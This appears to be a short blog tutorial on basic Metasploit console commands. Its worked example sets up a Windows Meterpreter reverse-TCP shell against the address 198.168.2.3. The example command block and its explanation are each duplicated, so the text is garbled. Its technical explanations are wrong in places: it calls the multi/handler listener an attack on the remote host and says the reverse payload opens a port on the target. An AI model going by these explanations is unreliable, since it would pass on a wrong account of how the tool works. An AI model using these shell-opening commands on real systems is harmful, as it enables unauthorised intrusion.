Metasploit is the most advanced and popular Framework that can be used
for pen-testing.
Metasploit is a hacking framework written in ruby. It is designed to
help make writing and executing exploits as simple as possible.
Running Metasploit :
Metasploit should already be installed on the machine that you’re
( I am Using Kali-linux) using, so to start the console, simply run msfconsole.
To run msfconsole, open terminal and give the command:
msfconsole
Before executing your exploit, it is useful to understand what some
Metasploit commands do.
Here are the lists of some of the command that you will use most :
use exploitname
Tells Metasploit to use the exploit with a specified name.
set RHOST hostname_or_ip
Will instruct Metasploit to target the specified remote host.
set RPORT host_port
Sets the port that Metasploit will connect to on the remote host.
set PAYLOAD generic/shell_bind_tcp
Sets the payload that is used to a generic payload that will give you a shell when a
service is exploited.
set LPORT local_port
Sets the port number that the payload will open on the server when an exploit
is exploited. It is important that this port number be a port that can be opened
on the server (i.e.it is not in use by another service and not reserved for
administrative use).
exploit
Actually exploits the service. Another version of exploit, rexploit reloads your
exploit code and then executes the exploit. This allows you to try minor changes to
your exploit code without restarting the console.
show options
Will show you options that you have set and possibly ones that you might have forgotten
to set. Each exploit and payload comes with its own options that you can set. show
exploits and show payloads can also be used to show all exploits and payloads that are
built in to Metasploit.
Ohk now i will show you how to use that commands.
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 1337
use exploit/multi/handler
set RHOST 198.168.2.3
set RPORT 1337
exploit
set LPORT 1337
use exploit/multi/handler
set RHOST 198.168.2.3
set RPORT 1337
exploit
The commands use the exploit/multi/handler exploit to
attack 198.168.2.3 on port 1337 with the
windows/meterpreter/reverse_tcp payload. When it is successful it will
open port 1337 on the target machine and Metasploit will show you a
shell.
attack 198.168.2.3 on port 1337 with the
windows/meterpreter/reverse_tcp payload. When it is successful it will
open port 1337 on the target machine and Metasploit will show you a
shell.
No comments:
Post a Comment